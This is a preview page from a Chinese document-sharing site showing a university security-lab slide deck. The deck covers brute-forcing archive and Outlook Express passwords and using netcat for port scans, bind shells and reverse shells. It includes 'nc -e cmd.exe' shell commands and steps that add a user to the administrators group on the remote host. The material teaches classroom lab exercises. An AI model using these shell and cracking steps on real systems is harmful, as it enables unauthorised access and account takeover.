返回
实验2:攻击技术.ppt

实验2:攻击技术.ppt

ID:48714750

大小:1.05 MB

页数:27页

时间:2020-01-19

实验2:攻击技术.ppt_第1页
实验2:攻击技术.ppt_第2页
实验2:攻击技术.ppt_第3页
实验2:攻击技术.ppt_第4页
实验2:攻击技术.ppt_第5页
资源描述:

《实验2:攻击技术.ppt》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库

1、网络与信息安全课程实验实验2:攻击技术授课教师:曲海鹏了解常见攻击技术的原理以及各自的特点和适用环境了解本地口令的安全设置策略掌握如何提高口令的安全性以对抗这些口令破解攻击方法了解网络和信息传输中存在哪些威胁及漏洞实验目的:口令暴力破解•使用arpr,破解压缩文件的加密口令•使用aoepr,破解outlookexpress的账户口令NetCat工具的使用•使用netcat进行端口扫描•使用netcat控制远程主机•使用netcat反向连接控制远程主机实验内容主要包括:1、口令暴力破解使用arpr,破解压缩文件的加密口令•安装arpr,并启

2、动软件,界面如下打开待破 解的文件设置暴破的密码范围•加载test.rar,点击开始,暴力破解开始暴破时间与密码长度和暴破策略有关,耐心等待。•暴力破解成功,结果显示如图。此处显示密码已成功恢复,并以明文形式显示压缩文件密码使用aoepr,破解outlookexpress的账户口令•安装aoepr,并启动软件,界面如下•打开Outlook,新建测试帐户•添加一个邮件帐户,用于测试密码恢复•添加一个邮件帐户,用于测试密码恢复-帐户显示名•添加一个邮件帐户,用于测试密码恢复-邮箱•添加一个邮件帐户,用于测试密码恢复-设置邮件服务器•添加一个邮

3、件帐户,用于测试密码恢复-设置帐户和密码•添加一个邮件帐户,用于测试密码恢复•添加一个邮件帐户,用于测试密码恢复•启动Aoepr,对目标帐户进行密码破解-点击Mail•下图显示,测试账户密码已经被成功破解2、NetCat工具的使用NetCat在网络工具中被誉为“瑞士军刀”,它可以作为类似于telnet的客户端,也可以作为服务器监听某个端口,还可以作为扫描工具扫描对方主机的端口,还可以用来传输文件。基本用法举例:•作为客户端连接目标主机的目标端口nc[目标主机(ip)][目标端口]•作为服务端监听本地端口nc-l-p[本地端口]netcat

4、参数•-eprog程序重定向,一旦连接,就执行[危险!!]•-isecs延时的间隔•-l监听模式,用于入站连接•-n指定数字的IP地址,不能用hostname•-ofile记录16进制的传输•-pport本地端口号•-r任意指定本地及远程端口•-saddr本地源地址•-uUDP模式•-v详细输出——用两个-v可得到更详细的内容•-wsecstimeout的时间•-z将输入输出关掉——用于扫描时使用netcat进行端口扫描•两个同学组成一组;•关闭防火墙;•分别扫描对方的开放端口:nc-vv-z-wa被扫描IP端口范围(其中a表示扫描时的时

5、间间隔);•记录扫描结果。使用netcat进行端口扫描举例:•主机A在命令行输入nc-v-l-p1027对1027端口进行监听:•主机B对主机A的1024-1030端口进行扫描,记录扫描结果:c:>nc-vv-z-w1192.168.1.81024-1030使用netcat控制远程主机•两个同学组成一组;•其中一台主机A使用nc绑定cmd.exe到a端口:nc-v-l-pa-ecmd.exe(其中a为1024-65535)•另一主机B连接该主机:ncx.x.x.xa•连接后,主机B进行如下操作:•在该机D盘根目录下建立一个名为remot

6、e的文件:echohello_remotehost>文件名•查看远程用户列表:netuser•增加一个用户test:netuser/addtest加入管理员组:netlocalgroup/addadministratorstest删除:netuser/deletetest使用netcat控制远程主机举例•主机A使用nc绑定cmd.exe到1027端口:•主机B连接主机A:ncx.x.x.x1027•连接后,主机B进行如下操作:•在该机D盘根目录下建立一个名为remote的文件:echohello_remotehost>d:文件名使用ne

7、tcat控制远程主机举例(续)•查看远程用户列表:netuser•增加一个用户test:netuser/addtest加入管理员组:netlocalgroup/addadministratorstest然后可以通过netusertest查看test帐户的属性:删除:netuser/deletetest使用netcat反向连接控制远程主机•两个同学组成一组;•其中一个主机使用nc进行监听:nc-vv-l-pa(a为端口号)•另一主机使用nc进行反向连接:nc-ecmd.exex.x.x.xa•记录实验结果。实验报告要求•实验目的•实验步骤•

8、实验结果-口令破解结果-通过nc可以进行的远程操作•问题:-如何保护outlookexpress账户密码?-Netcat软件具有哪些主要功能?实验2结束

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。